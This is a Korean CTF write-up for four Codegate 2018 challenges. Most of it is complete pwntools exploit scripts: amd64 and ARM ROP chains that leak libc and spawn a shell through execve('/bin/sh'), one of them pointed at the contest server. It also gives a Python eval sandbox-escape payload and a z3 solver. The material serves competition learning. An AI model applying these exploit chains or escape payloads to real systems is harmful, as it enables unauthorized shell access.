Codegate 2018 Write up : melong, BaskinRobins31, RedVelvet, ImpelDown

BaskinRobins31

Category : pwn

그냥 simple ROP 문제이다. 굳이 게임을 이길 필요는 없고 사용자 턴일때 ROP를 할 수 있다.

단 libc 파일이 주어지지 않아 *운*이 좋게인진 모르겠는데 최신 버전은 다 그런지도 모르겠지만은 본인 버전 libc로는 오프셋 계산 공격이 되지 않길래 libc의 read함수 text영역에서 \x0f\x05(syscall)이 나올때까지 긁은 후 시스템 콜 인자를 구성 해 공격 했다.

#!/usr/bin/python from pwn import * e = ELF("./BaskinRobins31") context.clear(arch='amd64') #p = process("./BaskinRobins31"); p = remote("ch41l3ng3s.codegate.kr",3131) raw_input(">>>") g = 0x40087a dumm = 'a'*184 payload = '' payload += dumm payload += p64(g) # leak libc payload += p64(1) payload += p64(0x602040) payload += p64(8) payload += p64(e.symbols['write']) payload += p64(g) # recv /bin/sh payload += p64(0) payload += p64(e.symbols['__bss_start']+0x100) payload += p64(0x1000) payload += p64(e.symbols['read']) payload += p64(e.symbols['main']) p.recvuntil("(1-3)\n") p.send(payload) p.recvuntil("...:(\x20\x0a") libc_read = u64(p.recv(8)) libc_syscall = libc_read + 14 # syscall offset from read() p.send("/bin/sh\x00") payload = '' payload += dumm payload += p64(g) # set rax for syscall payload += p64(0) payload += p64(e.symbols['__bss_start']+0x200) payload += p64(0x1000) payload += p64(e.symbols['read']) payload += p64(g) # syscall(execve,’/bin/sh’,0,0); payload += p64(e.symbols['__bss_start']+0x100) payload += p64(0) payload += p64(0) payload += p64(libc_syscall) p.recvuntil("(1-3)\n") p.send(payload) p.recvuntil("...:(\x20\x0a") p.send("0"*0x3b) # execve : 0x3b p.interactive() </span></span>

melong

category : pwn

아 진짜… 베스킨 라빈스에서 2시간 낭비 하지만 않았어도 풀었는데…

libc파일이 제공되지 않아 베라와 비슷하게 svc 이용한 방법으로 푸려고 시도 했음.

취약점 찾는데 5분 릭하는데 20분 익스하는데 1시간 30분

딱 30분만 더 있었어도 푸는건데 으악- 대회 끝나고 30분만에 풀어버린 아쉬운 ㅠㅠ

#!/usr/bin/python from pwn import * p = process("./run.sh") e = ELF("./melong") bss = e.symbols['__bss_start'] ''' for loading args ''' g1 = 0x11d28 # pop {r4-r10,pc} g2 = 0x11d10 # mov r2,r9; mov r1,r8; mov r0,r7; blx r3; cmp r4,r6; bne ... g3 = 0x11d3c # pop {r3,pc} ''' for fake ebp ''' g4 = 0x11080 # sub sp, r11, #8; pop {r4,r11,pc} g5 = 0x11088 # pop {r4,r11,pc} read_got = 0x23010 libc_syscall = 0 def syscall(r0,r1,r2,r7): ret = '' ret += p32(g1) ret += "BBBB"*3 ret += p32(r0)+p32(r1)+p32(r2) ret += "EEEE" ret += p32(g3) ret += p32(g1) ret += p32(g2) ret += "4444" + "5555" + "6666" ret += p32(r7) # execve ret += "8888" + "9999" + "1010" ret += p32(libc_syscall) return ret def call(r7,r8,r9,pc): ret = '' ret += p32(g1) ret += "BBBB"*3 # bypass bne ret += p32(r7) + p32(r8) + p32(r9) ret += "EEEE" ret += p32(g3) ret += p32(pc) ret += p32(g2) ret += 'aaaa'*7# pop {r4-r10,pc} return ret def do_main(sdata): print "[*] sending payload ..." p.sendline("1") p.sendline("1.82") # it’s p.sendline("77”) # real p.recvuntil("Type the number:") p.sendline("2") p.recvuntil("Type the number:") p.sendline("3") p.sendline("-1") p.recvuntil("Type the number:") p.sendline("4") p.send(sdata) p.recvuntil("Type the number:") p.sendline("6") p.recvuntil(":)\n") print "[+] sending success" payload = '' payload += 'A'*80 payload += "BBBB" payload += call(read_got,0,0,e.symbols['puts']) payload += call(0,bss,0x400,e.symbols['read']) payload += p32(g5) + "AAAA" + p32(bss+16) payload += p32(g4) + "BBBB"*2 do_main(payload);sleep(0.5) leak = u32(p.recv(4)) print "[+] LEAK : "+hex(leak) print "[+] SVC : "+hex(leak+24) libc_syscall = leak+24 payload = '' payload += "/bin/sh\x00" payload += "FFFF"*2 + p32(g3) + "ABCD" payload += syscall(bss,0,0,0xb) p.sendline(payload) p.interactive() </span></span>

ImpelDown

Category : pwn

별거 없다. 이리저리 만지다 보면 오류를 터트릴 수 있는데 거기서 힌트를 얻었다. your 객체를 쓰며 your.name에 이름이 들어 간다. 그러면 your.name이 필터링이 되지 않아 어떤 함수를 실행 시키기만 하면 된다고 생각을 했고 eval(“your.”+command+”()”); 여기서 그냥 and문으로 우회 해 줬다

__import__("os").system("/bin/sh") name and eval(your.name) and your.dig </span></span>

RedVelvet

Category : rev

그냥 딱 보고 angr나 z3을 이용 하겠거니 했는데 angr를 돌리니까 초반에 조금 나오다 말아서 z3를 돌렸다.

끝나고 보니 복수정답?때문에 소스를 다르게 짜야 된다는데 본인은 한 바이트 게싱 했다.

from z3 import * s = Solver() arr = [ BitVec('a%i'%i,8) for i in range(0,26)] p = 'What_You_Wanna_Be?:)' for i in range(18): s.add(arr[i]==ord(p[i])) #17, 18, 19 s.add(arr[17]>=arr[18]) s.add(arr[18]>=arr[19]) s.add(arr[18]<=59) s.add(arr[19]<=44) s.add(arr[17]+(arr[18]^(arr[19]+arr[18]))-arr[19]==111) s.add((arr[18]^(arr[18]-arr[19]))+arr[18]==101) #19, 20, 21 s.add(arr[19]<=arr[20]) s.add(arr[20]<=arr[21]) s.add(arr[19]>40) s.add(arr[20]>90) s.add(arr[21]<=109) s.add(arr[21]+(arr[20]^(arr[21]+arr[19]))-arr[19]==269) s.add((arr[21]^(arr[20]-arr[19]))+arr[20]==185) #21, 22, 23 s.add(arr[21]>=arr[23]) s.add(arr[22]>=arr[23]) s.add(arr[22]<=99) s.add(arr[23]>90) s.add(arr[21]+(arr[22]^(arr[22]+arr[21]))-arr[23]==185) #23, 24, 25 s.add(arr[24]>=arr[25]) s.add(arr[24]>=arr[23]) s.add(arr[25]>95) s.add(arr[24]<=109) s.add(((arr[24]-arr[23])*arr[24]^arr[25])-arr[23]==1214) s.add(((arr[25]-arr[24])*arr[25]^arr[23])+arr[24]==-1034) print s.check() print s.model()</span></span>